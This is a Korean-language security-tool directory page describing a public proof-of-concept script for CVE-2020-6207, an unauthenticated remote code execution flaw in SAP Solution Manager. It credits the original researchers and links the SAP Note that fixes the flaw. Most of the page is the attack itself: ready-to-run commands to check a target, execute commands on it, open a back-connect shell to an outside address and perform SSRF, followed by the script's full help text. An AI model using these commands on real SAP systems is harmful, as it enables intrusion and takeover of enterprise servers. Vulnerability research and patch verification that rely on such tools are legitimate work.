Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
SAP_EEM_CVE-2020-6207 — CVE-2020-6207에 대한 PoC (SAP Solution Manager에서 인증 확인 누락) | Kitploit
도구/GitHubGitHub/chipik/sap_eem_cve-2020-6207
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlLearning & EducationRemote Access Tool
GitHubchipik/sap_eem_cve-2020-6207

SAP_EEM_CVE-2020-6207

CVE-2020-6207에 대한 PoC (SAP Solution Manager에서 인증 확인 누락)

저장소 보기
82255년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2020-6207에 대한 PoC (SAP Solution Manager의 인증 확인 누락)
이 스크립트는 SAP Solution Manager에 연결된 SAP SMDAgent에서 RCE로 이어지는 SAP EEM 서블릿(tc~smd~agent~application~eem)의 인증 확인 누락을 확인하고 악용할 수 있게 해줍니다.
원본 발견:

  • Pablo Artuso
  • Yvan 'iggy' G

논문: An Unauthenticated Journey to Root :Pwning Your Company's Enterprise Software Servers
해결 방안: SAP 노트 2890213

트위터에서 팔로우하세요: @chipik

이 프로젝트는 교육 목적으로만 제작되었으며 법률 위반이나 개인적 이득을 위해 사용될 수 없습니다.
이 프로젝트의 저자는 이 프로젝트의 자료로 인해 발생할 수 있는 어떠한 피해에 대해서도 책임을 지지 않습니다

세부 정보

취약점 세부 정보는 process 문서에서 확인할 수 있습니다

사용 방법

SAP Solution Manager 호스트명/IP를 지정하기만 하면 됩니다.

확인

root@kitploit:~
➜ python sol-rce.py -H 172.16.30.43 -P 50000 -c
Vulnerable! [CVE-2020-6207] - http://172.16.30.43:50000

RCE 트리거

root@kitploit:~
➜ python sol-rce.py -H 172.16.30.43 -P 50000 --rce calc.exe

gif

BackConnect 획득

root@kitploit:~
➜ python sol-rce.py -H 172.16.30.43 -P 50000 --back 1.1.1.1:1337

SSRF

root@kitploit:~
➜ python sol-rce.py -H 172.16.30.43 -P 50000 --ssrf http://1.1.1.1/chpk

기타

추가 옵션이 있습니다:

root@kitploit:~
➜ python sol-rce.py -h

usage: sol-rce.py [-h] [-H HOST] [-P PORT] [-p PROXY] [-s] [-c] [-d VICTIM]
                  [--ssrf SSRF] [--rce RCE] [--back BACK] [--setup SETUP]
                  [--list] [--clear] [-t TIMEOUT] [-v]

PoC for CVE-2020-6207, (Missing Authentication Check in SAP Solution Manager)
This script allows to check and exploit missing authentication checks in SAP EEM servlet (tc~smd~agent~application~eem) that lead to RCE on SAP SMDAgents connected to SAP Solution Manager
Original finding:
- Pablo Artuso. https://twitter.com/lmkalg
- Yvan 'iggy' G https://twitter.com/_1ggy

Paper: https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf
Solution: https://launchpad.support.sap.com/#/notes/2890213

twitter: https://twitter.com/_chipik

optional arguments:
  -h, --help            show this help message and exit
  -H HOST, --host HOST  SAP Solution Manager host(default: 127.0.0.1)
  -P PORT, --port PORT  SAP Solution Manager web port (default: tcp/50000)
  -p PROXY, --proxy PROXY
                        Use proxy (ex: 127.0.0.1:8080)
  -s, --ssl             enable SSL
  -c, --check           just detect vulnerability
  -d VICTIM, --victim VICTIM
                        DA serverName
  --ssrf SSRF           exploit SSRF. Point http address here. (example:http://1.1.1.1/chpk)
  --rce RCE             exploit RCE
  --back BACK           get backConnect from DA. (ex: 1.1.1.1:1337)
  --setup SETUP         setup a random serverName to the DA with the given hostName and instanceName. (example: javaup.mshome.net,SMDA97)
  --list                Get a list of existing DA servers
  --clear               stop and delete all PoCScript<rnd> scripts from DA servers
  -t TIMEOUT, --timeout TIMEOUT
                        HTTP connection timeout in second (default: 10)
  -v, --verbose         verbose mode
도구 다운로드